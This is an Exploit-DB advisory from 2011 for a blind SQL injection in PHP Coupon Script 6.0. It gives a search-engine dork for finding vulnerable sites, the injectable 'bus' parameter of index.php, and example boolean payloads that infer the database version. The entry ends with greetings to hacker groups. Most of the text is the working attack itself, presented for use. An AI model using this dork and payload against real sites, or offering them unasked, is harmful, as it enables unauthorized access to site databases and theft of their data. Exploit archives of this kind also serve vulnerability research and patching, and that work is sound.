PHP Coupon Script 6.0 - bus Blind SQL Injection Vulnerability

2011-01-23T00:00:00
ID EDB-ID:16034
Type exploitdb
Reporter BorN To K!LL
Modified 2011-01-23T00:00:00

Description

PHP Coupon Script 6.0 - (bus) Blind SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ==
[|]Script: PHP Coupon Script
[|]Version: 6.0
[|]Dork: "PHP Coupon Script v. 6.0"
[|]Link: http://www.couponscript.com
==
[|]Author: BorN To K!LL - h4ck3r
[|]Contact: SQL@hotmail.co.uk
==
[|]3xploit:
/index.php?page=viewbus&bus=[Blind-Injection]

[|]3xample:
/index.php?page=viewbus&bus=1 and substring(version(),1,1)=4                       // false ,,
/index.php?page=viewbus&bus=1 and substring(version(),1,1)=5                       // true ,,

==
[|]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==